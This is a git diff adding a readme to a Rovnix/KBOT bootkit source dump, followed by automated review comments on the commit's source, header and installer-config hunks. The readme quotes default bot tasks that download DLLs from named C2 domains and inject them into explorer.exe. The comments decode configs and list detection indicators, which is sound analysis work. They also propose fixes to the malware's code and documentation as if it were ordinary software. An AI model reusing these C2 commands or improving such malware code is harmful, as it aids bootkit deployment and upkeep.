index 000000000..e79c6d754 --- /dev/null +++ b/Rovnix/_DUMP/readme.txt 
@@ -0,0 +1,29 @@ +#Dump + +Contains some .svn files which may contain more clues to the creators etc. + +Example of found so far: + +MAKEDIR_LOWERCASE=e:\projects\progs\petrosjan\bootkit\kbot +OBJ_PATH=e:\projects\progs\petrosjan\bootkit\kbot + +//#define szDefaultTask "LOAD_FILE http://shaparack.com/img/admin/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n" +//#define szDefaultTask "LOAD_FILE http://56tgvr.info/geter/getFile.php BT1.DLL\r\nLOAD_FILE http://56tgvr.info/geter/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n" +#define szDefaultTask "LOAD_FILE http://56tgvr.info/geter/getFile.php BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n" +//#define szDefaultTask "LOAD_FILE http://az2.zika.in/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n" +//#define szDefaultTask "LOAD_FILE http://security-checking.org/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n" + +#define KBOT_DEFAULT_HOST_LIST " 10.30.29.241 " + + + +// Supported commands +// Note that command names are case-sensitive, but command parameters are not. + +// LOAD_FILE http://myhost.com/myfile.dll myfile32.dll - downloads file http://myhost.com/myfile.dll and saves it to the VFS +// as \MYFILE32.DLL +// DELETE_FILE myfile32.dll - deletes file \MYFILE32.DLL from the VFS +// SET_INJECT myfile32.dll explorer.exe iexplore.exe - requests the KLOADER to inject \MYFILE32.DLL into the specified processes +// READ_FILE \??\C:\myfile.dll myfile.dll - ?????? ????? ? ????? + +// $Date: 2012-02-20 18:55:12 +0400 (??, 20 ??? 2012) $
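Review bot: in the KBotStartup part of the KBotMainThread/KBotStartup hunk, `if (!GetJoinedData((PIMAGE_DOS_HEADER)BkImageBase, &g_KbotPublicKey, &Size, FALSE, CRC_PUBLIC_KEY, 0)) g_KbotPublicKey = NULL;` lets startup continue with no public key, and nothing in this hunk shows whether KBotRequestAndCheckFile then fails or silently skips signature checking; since the project readme states that files failing verification are ignored, the behaviour with a missing key should be documented next to this line. The same hunk also fixes several stable artifacts an analyst can key on: the user-agent produced from szUserAgentFmt in KBotInitUserAgent, the VFS name in `RTL_CONSTANT_STRING(szKBotConfigFileName)` (KBOT.INI), and the checked-build strings "KBOT: main thread started." and "KBOT version 1.0 started.". Minor: "Startup and clenup" in the section banner should read "cleanup".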
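Review bot: in the tasks.c hunk, CmdLoadFile fetches the LOAD_FILE target with plain `KBotRequest(Host, Uri, szGet, &Buffer, &bSize)` and writes the body straight to the VFS via `FsSaveFile(&aName, Buffer, bSize)`, whereas the config and task files in kbot.c go through KBotRequestAndCheckFile; the documentation should state plainly that the readme's signature/CRC check covers only config and task files, not the payload files those tasks name. In ProcessTaskFile, ntStatus stays at STATUS_INSUFFICIENT_RESOURCES when the allocation succeeded but every line began with ';', so the caller sees an allocation failure that never happened; the two trailing comments `// while(CmdStrings[i])` and `// if (CmdLine = KBotAlloc(bSize + 1))` name variables that do not exist in the function (the code uses Buffer and NewBuffer), and "adding extra NULL-chat to it's end" should read "adding an extra NUL char to its end".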
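Review bot: in the tasks.h hunk, `#define CRC_GET_INJECT 0x0ad96aaf` has no counterpart: the "Supported commands" comment lists only LOAD_FILE, DELETE_FILE and SET_INJECT, and the switch in ProcessCommandLine (tasks.c hunk) has cases only for CRC_LOAD_FILE, CRC_DELETE_FILE and CRC_SET_INJECT, so the define is either dead or the command list is incomplete, and the comment should say which. The comment also omits the removal form that the project readme documents (SET_INJECT with a file name and no process list), which belongs next to the SET_INJECT example.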
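Review bot: in the kbot.h hunk, `#define _ENCRYPT_REQUEST_URI TRUE` is later tested with `#ifdef _ENCRYPT_REQUEST_URI`, so the `#else` branch carrying the plaintext "/config.php?" and "/task.php?" URIs can never be selected whatever value the macro is given; `#if _ENCRYPT_REQUEST_URI` would match the intent of defining it as TRUE, and the same applies to `_USE_DIGITAL_SIGNATURE TRUE` if it is tested the same way elsewhere. For detection, this header pins the values an analyst can match statically: SERVER_DEFAULT_KEY "0123456789ABCDEF", the URI templates "/c%s.php?%s=" and "/t%s.php?%s=", szRequestFmt "version=%u&user=%x%x%x%x&server=%u&id=%u&crc=%x", the user-agent template with the " x64;" insert, and KBOT_DEFAULT_HOST_LIST " 10.30.29.241 ", a private-range lab address.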
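Review bot: in the sources hunk, `BUFFER_OVERFLOW_CHECKS=0` turns off the /GS stack cookie for the whole kbot library, and `MSC_WARNING_LEVEL=/W3 /WX` sits inside `!IF $(FREEBUILD)`, so only free builds treat warnings as errors; both settings should be stated in the readme. For anyone matching a recovered driver against this source, `C_DEFINES=$(C_DEFINES) /Gz` together with `MSC_STDCALL = 1` makes __stdcall the default calling convention in free builds, which affects how the kbot.c, config.c, tasks.c and sendrecv.c functions appear in a disassembler.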
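Review bot: the comments in the d5c1d6905845… kbot.ini hunk are Windows-1251 Russian rendered as Latin-1 mojibake and should be stored as UTF-8 or have the encoding declared; read in cp1251 they say this is the KBOT configuration file, that it can be attached to the driver with the FJ utility, and that at start the program looks for it on the VFS first and then in the driver; Hosts is a comma-separated list of hosts to try for the control server, Group is any number not above 2147483647, Key is the RC6 key used to obfuscate server requests (only the first 16 bytes are used, zero-padded if shorter), and ConfigPeriod and TaskPeriod are in seconds. The shipped `Key = 0123456789ABCDEF` is identical to SERVER_DEFAULT_KEY in the kbot.h hunk, so request obfuscation in this sample relies on a constant that is present in the source, which the comment should acknowledge.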
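Review bot: in the kbotinc.h hunk, `PCHAR g_KbotPublicKey;`, `PKBOT_CONFIG volatile g_KBotConfig;` and `KBOT_USER g_KBotUserId;` are object definitions rather than `extern` declarations in a header included by kbot.c and tasks.c (and, per the sources hunk, presumably config.c and sendrecv.c); `PCHAR g_KbotUserAgent;` in the kbot.h hunk follows the same pattern. This only links because the compiler merges tentative definitions, so the headers should carry `extern` declarations with one definition in the .c file each "from …" comment already names.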
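Review bot: the e4c23fad23de… hunk is the FJ utility configuration, again cp1251 Russian shown as mojibake; decoded, its comments say FJ attaches the listed drivers and libraries to the installer, which at run time determines the OS bitness and installs the matching driver, SOURCE is the source installer (EXE or DLL), OUT the output file, `BIN: Release\vbr.com` the initial boot loader, each `DRV:` the 32-bit or 64-bit kloader.sys, and each driver is followed by `BIN: public.key` (the RSA public key for file signature checks) and `BIN: kbot.ini`. For analysis this is the list of blobs to expect appended to setupdll.dll; as a style point, the 64-bit path `..\bin\release\amd64` differs in case from `..\bin\Release\i386`, harmless on NTFS but inconsistent with the rest of the file.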
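Review bot: the e96f819fc48f… readme hunk (cp1251 Russian as mojibake) describes KBOT as an NT-kernel bot library for XP through Win7 on x86 and AMD64 that downloads files over HTTP, stores them on the VFS and registers them with the KLDR module for injection into named processes, obfuscates each request with RC6 and Base64, and verifies an RSA signature on config and command files using the attached public.key, ignoring files that fail. Two documentation points: it says a "16-bit" user ID is generated and stored in \USER.ID, while KBOT_USER.Id in the kbot.h hunk is a GUID (16 bytes) and szRequestFmt transmits it as four hex fields, so it should read "16-byte"; and the command list shows "LOAD_FILE [VFS file name]" with the URL placeholder missing, most likely an angle-bracket token lost during extraction. The text also fixes the VFS names \USER.ID, \KBOT.INI and \INJECTS.SYS (where SET_INJECT entries persist across reboots), which are the artifacts a defender would look for.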
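Review bot: in the readme.txt hunk, the "Example of found so far" block quotes build paths under e:\projects\progs\petrosjan\bootkit\kbot, four szDefaultTask lines naming shaparack.com, 56tgvr.info, az2.zika.in and security-checking.org, and `KBOT_DEFAULT_HOST_LIST " 10.30.29.241 "`; these are the commit's own indicators and should be listed as such with the file each came from, not as an unlabeled example. The quoted command comment also contains a `READ_FILE \??\C:\myfile.dll myfile.dll` line whose description survives only as question marks, and no READ_FILE hash exists in the tasks.h hunk of this same commit despite the identical `$Date: 2012-02-20 18:55:12 +0400` stamp, so the block was copied from a different revision of tasks.h than the one committed here and the readme should say which.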